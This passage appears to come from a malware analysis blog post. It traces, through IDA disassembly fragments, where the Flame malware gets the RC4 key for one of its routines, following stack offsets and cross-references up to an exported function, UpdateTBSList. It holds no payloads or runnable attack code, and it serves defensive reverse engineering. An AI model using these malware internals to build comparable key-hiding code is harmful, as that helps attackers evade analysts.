Dead point, indeed... or maybe not! Let's reconsider the parameters passed to the "key_from_arg0?" function: maybe the parameter we are interested in isn't passed via stack, but via register... Maybe the missing piece is the instruction:

.text:1000E687 lea ebx, [esi+108h]

and we have to follow esi+108h instead of arg0!

At the top of the "do_rc4" function we notice:

.text:1000E67F mov esi, ecx


So, esi+108h is passed to the "do_rc4" function, via the "this" pointer.

Now let's follow back the cross reference; if we scroll up the code we notice:

.text:1000E5B2   push [ebp+p_key_bytes]
.text:1000E5B5   mov ebx, [ebp+arg_8]
.text:1000E5B8   lea eax, [esi+108h]
.text:1000E5BE   push eax

.text:1000E5BF mov dword ptr [esi], offset off_10073520

.text:1000E5C5   call instantiate_object


This totally makes sense! There is a second call to the "instantiate_object" function and this time its parameters are p_key_bytes and esi+108h. It makes us think that this function creates an object with the bytes of the key from p_key_bytes and puts its address in esi+108h.

Ok, here we go... Again! Recursive way to think: let's call "do_rc4_2" the function we are in and follow p_key_bytes via Cross Reference to see when it is filled.

.text:1000129A   lea ecx, [ebp+58h]
.text:1000129D   call get_key_object
.text:100012A2   push eax
.text:100012A3   lea eax, [ebp-1F4h]

.text:100012A9 push eax

.text:100012AA call do_rc4_2

"p_key_bytes" is the second parameter of "do_rc4_2" and to investigate its value we have to follow eax, that is... the return value of the "get_key_object" function we have already described. It reads an object from the address contained in ecx... that is... the one contained in ebp+58h! Really, really weird!
Why ebp+58h? Are there so many parameters on the stack?

In order to understand the situation properly, we have to go at the beginning of the function "do_rc4_2":

.text:10001230 push ebp

.text:10001231 sub esp, 48h

.text:10001234 mov eax, offset sub_1006A3CF

.text:10001239 call __EH_prolog

To skip some boring calculations, let's just say that "__EG_prolog" sets the value of ebp to esp-4. So, after the execution of these instructions, the stack will look like this:

... [prolog][48h bytes][ebp][ret_addr][param_1][param_2] ...

So:

prolog + 48h + ebp + ret_addr + param_1 = 4h + 48h + 4h +4h +4h = 58h

It sounds good! It means that the code points to param_2.

Once again... we call "go" the function we are in, and look for the "go" second parameter via Cross Reference.

.text:10003254 sub esp, 14h

.text:10003257 mov eax, esp

.text:10003259 mov [ebp+78h], esp

.text:1000325C push eax

.text:1000325D mov ebx, [ebp+68h]

.text:10003260 call do_newcopy_addref

.text:10003265 mov byte ptr [ebp-4], 2

.text:10003269 push dword_10091C08

.text:1000326F mov byte ptr [ebp-4], 1

.text:10003273 call go

And here comes the problem... we are looking for the second parameter, but there's only one push! Don't panic.

Let's give a look at the code: first it allocates memory on the stack, using the sub esp, 14h instruction, and then it calls the "do_newcopy_addref" function that copies something from the value at the address in ebp+68h to esp-14h (once again, ebp+68h is passed via register!).

So, we have to re-figure out what the stack looks like:

... [prolog][48h bytes][ebp][ret_addr][param_1][14h bytes object] ...

Basically, param_2 is a 14h bytes object.

This is unusual, as normally the code would have passed a pointer to the object instead of the object itself. This also makes the code more difficult to analyze because, in this way, IDA cannot recognize the parameter anymore.

We are almost done: let's focus on ebp+68h and try to track it back!

.text:1000323E push dword ptr [ebp+78h]
.text:10003241 lea eax, [ebp+68h]

.text:10003244 push eax

.text:10003245 call sub_1000346A

The reasoning is always the same: we see a function with two parameters, one of which is ebp+68h; so, we can suppose that the other one, that is ebp+78h, points to the bytes of the key and the function instantiates an object by making a copy from the key itself.

Now, we have to follow ebp+78h. It reminds us of the weird parameter ebp+58h we saw before... So, again, we go at the beginning of the function and notice:

.text:100031FA push ebp

.text:100031FB sub esp, 6Ch

.text:100031FE mov eax, offset loc_1006ACBC

.text:10003203 call __EH_prolog

This time the stack will look like this:

... [prolog][6Ch bytes][ebp][ret_addr][param_1][param_2] ...

and

prolog + 6Ch + ebp + retaddr = 4h + 6Ch + 4h + 4h = 78h

So, ebp+78h points to param_1.

Again, we go via Cross Reference to follow param_1 and see:

.text:100126FB push [ebp+arg_0]

.text:100126FE call sub_100031FA

arg0 is our target! Another first parameter to follow, another Cross Reference to see:

.text:100033BA push [ebp+arg_0]

.text:100033BD call sub_100126D5

But now we are in a very special function:

.text:100033A4 UpdateTBSList proc near

It is an export function, but even knowing that, it doesn't make us retrieve the key as it is not called from within the executable module itself...!

Here is a visual representation of the whole analysis we have done:

I hope this discussion has given you an idea of how much such a kind of structured code can make things complicated... although we went very deeply in the code to track the key back, even at the end of our analysis, we didn't find its value!

Are we close to it? Mmm... close enough at least :P

I'm not going to describe every single detail, but let's just think of the next logical step.

You may think about looking for the call to "UpdateTBSList" in the other components of Flame, but you won't find anything because the strings are encrypted! So, first you have to decrypt the strings and then you can look in every component of the malware to find where the export is called :)

But, even knowing that... once you have finally retrieved the key... what is it useful for? Was this time-consuming effort worth it?

Well, it definitely is but, to understand why, you should conduct further investigation... :) This "never ending task" makes us think of the direction malware analysis is taking in these years: lot of effort, lot of patience, lot of dedication is required to perform even a small analysis like that!